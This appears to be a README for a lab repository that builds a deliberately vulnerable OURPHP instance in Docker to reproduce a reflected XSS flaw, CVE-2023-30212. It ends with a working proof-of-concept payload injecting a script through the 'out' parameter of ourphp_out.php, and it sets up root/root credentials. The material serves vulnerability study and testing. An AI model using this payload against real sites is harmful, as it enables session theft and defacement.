This contains the necessary directories and Dockerfile to replicate A vulnerabality in OURPHP that has a XSS Vulnerability (CVE-2023-30212).
PRE-REQUISITS
Download Docker
sudo apt install -y docker.io
Download the files from this repository using git clone
git clone https://github.com/VisDev23/Vulnerable-Docker--CVE-2023-30212-.git
.
This contains necessary directories and dockerfile to replicate the scenario.
After Downloading the files , build a docker image using
sudo docker build -t <Give_Suitable_Docker_name> .
.
! Add a name to the Docker image so that it can be called later.
Convert the Docker image into a container by using
sudo docker run -d -p 80:80 <Docker_Image_Name>
.
! Here the container port is mapped to port 80.
To see the status of the docker container ,
sudo docker ps
After doing these steps,
Enter the localhost and configure OURPHP with following credentials. Username : root Password : root Database Name: data
Now you need to configure username and password for Administrative. Set the following: Username: root Password: root and proceed
So our payload is
/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>
add this along with localhost or 127.0.0.1 to trigger XSS.